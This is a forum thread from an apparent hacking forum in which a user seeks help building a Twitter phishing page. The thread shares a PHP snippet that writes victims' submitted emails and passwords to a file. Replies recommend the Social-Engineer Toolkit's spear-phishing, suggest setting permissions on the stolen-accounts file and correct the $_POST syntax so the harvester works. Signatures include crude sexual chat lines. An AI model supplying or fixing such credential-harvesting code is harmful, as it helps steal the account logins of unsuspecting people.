Author Topic: Twitter username and paswords variables handling  (Read 1103 times)

0 Members and 1 Guest are viewing this topic.

Offline Galtor

  • NULL
  • Posts: 2
  • Cookies: -1
    • View Profile
Twitter username and paswords variables handling
« on: May 31, 2015, 03:16:44 pm »
Hi all,

I'm trying to get a pof of a Twitter phishing, but I'm getting problems with the PHP file that writes victim's inputs into another file. The PHP code I started programming was this:

$fp = fopen("TwitterPasswords.htm", "a");
fwrite($fp, "Email:$_POST[username_or_email]\tPassword:$_POST[password]");
echo "<HTML>

and according to Twitter source page, variables are name="session[username_or_email]"  and name="session[password]". I'm quite newbie, how can I handle those variables, please?

Thanks a lot,


Offline iTpHo3NiX

  • EZ's Pirate Captain
  • Administrator
  • Titan
  • *
  • Posts: 2920
  • Cookies: 328
    • View Profile
    • EvilZone
Re: Twitter username and paswords variables handling
« Reply #1 on: May 31, 2015, 04:33:02 pm »
Those are long, I don't think you can handle it
[09:27] (+lenoch) iTpHo3NiX can even manipulate me to suck dick
[09:27] (+lenoch) oh no that's voluntary
[09:27] (+lenoch) sorry

Offline Galtor

  • NULL
  • Posts: 2
  • Cookies: -1
    • View Profile
Re: Twitter username and paswords variables handling
« Reply #2 on: May 31, 2015, 06:46:04 pm »
if so, is there any way to catch those variables? I think that there are those phishing web pages based on old versions of Twitter.

Thanks

Offline iTpHo3NiX

  • EZ's Pirate Captain
  • Administrator
  • Titan
  • *
  • Posts: 2920
  • Cookies: 328
    • View Profile
    • EvilZone
Re: Twitter username and paswords variables handling
« Reply #3 on: May 31, 2015, 11:04:10 pm »
Use SET, spear-phishing. Make sure you chmod you text file to store the accounts. But anyways that went WAY over your head
[09:27] (+lenoch) iTpHo3NiX can even manipulate me to suck dick
[09:27] (+lenoch) oh no that's voluntary
[09:27] (+lenoch) sorry

Offline ande

  • Owner
  • Titan
  • *
  • Posts: 2664
  • Cookies: 256
    • View Profile
Re: Twitter username and paswords variables handling
« Reply #4 on: May 31, 2015, 11:24:11 pm »
Are that code supposed to work? $_POST[username_or_email] and $_POST[password] are not valid syntax. I think you will have to do $_POST['username_or_email'] and $_POST['password'] in this case.

PS: I think you should post a bit more information about the environment you are working on. Twitter source page? session? What does your POST form look like? Where does it come from and how is it sent? And so on.
« Last Edit: May 31, 2015, 11:26:06 pm by ande »
if($statement) { unless(!$statement) { // Very sure } }
https://evilzone.org/?hack=true